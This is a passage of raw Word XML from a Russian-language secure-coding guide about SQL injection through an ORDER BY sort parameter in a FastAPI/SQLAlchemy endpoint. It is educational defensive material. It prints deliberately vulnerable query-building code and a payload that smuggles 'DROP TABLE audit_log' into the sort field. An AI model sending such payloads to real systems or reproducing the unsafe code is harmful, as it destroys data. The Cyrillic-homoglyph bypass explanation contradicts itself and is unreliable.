        <w:t>•   OWASP: «SQL Injection Prevention Cheat Sheet» (раздел Defense Option 1: Prepared Statements) — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE066C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger: «SQL injection cheat sheet» (раздел Combining queries) — https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED30720" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   FastAPI Docs: «Query Parameters and String Validations» — https://fastapi.tiangolo.com/tutorial/query-params-str-validations/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C550FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SQLAlchemy Docs: «Using textual SQL» — https://docs.sqlalchemy.org/en/20/tutorial/dbapi_transactions.html#using-textual-sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC09EDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.14.2 ORDER BY column_name (identifier-token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AD9BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sort-by-column в REST-API — пользователь указывает имя колонки для сортировки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort=created_at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). PostgreSQL Wire Protocol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>физически не позволяет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bind-параметру быть идентификатором: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляется только в expression-position. Это означает, что для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имя колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> попасть в SQL как литеральный текст. Единственная корректная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whitelist допустимых имён</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для финального quoting. Антипаттерны: whitelist-set с прямой concat без quoting, whitelist на lowercase без Unicode-нормализации (обход через Cyrillic-homoglyphs), отсутствие whitelist вообще (concat user input напрямую).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F87D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A2F32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># app/api/v1/products.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F617BF0"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19DC79E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CA8D2"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44255256"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66D4831C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6A929" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57843128" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EAC45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Антипаттерн A — whitelist-set, но concat без quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C038A4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD0DB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11637D8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D41E74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A123A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: str = Query("created_at"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0A903" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: str = Query("asc"),  # "asc" или "desc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0A38A"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6E4EE1F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F8BE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E63E23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sort = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA80CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if order.lower() not in ("asc", "desc"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C529A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        order = "asc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9A9D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55C3BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B434F07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, name, price, rating, created_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B94D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C8BE2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE deleted_at IS NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834197D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort} {order}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2AE26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149FA433" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AFB70"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623CD964"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536CCC22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработчик правильно сделал whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SORTABLE_COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не нормализовал входной string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед сравнением — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set membership</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Python case-sensitive и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не учитывает Unicode-эквивалентность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Name" not in {"name", ...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → True → fallback на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"created_at"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"nаme"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с Cyrillic 'а') </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тоже not in SORTABLE_COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → False → fallback. Кажется безопасным, но если whitelist-проверка имеет hole (например, разработчик добавил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if sort not in SORTABLE_COLUMNS: sort = sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или вообще пропустил check для редкого endpoint), Unicode-обход всплывает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE02965" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Более реалистичный антипаттерн — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whitelist отсутствует совсем</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0B087" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A104A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_products(sort: str = Query("created_at"), ...):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C8429" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT ... ORDER BY {sort} LIMIT 50")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6FEA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ ни whitelist, ни quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983F368" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361DB319" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — direct injection (когда whitelist отсутствует):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CA983" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /products?sort=name;%20DROP%20TABLE%20audit_log--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFE1DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort = "name; DROP TABLE audit_log--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (в simple-protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79784B2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, name, price, rating, created_at FROM products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8D52B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE deleted_at IS NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D468199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name; DROP TABLE audit_log-- asc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E6C684" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A7A36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Парсер разбивает на два statement, второй — DROP. В extended-mode </w:t>
      </w:r>
      <w:r>
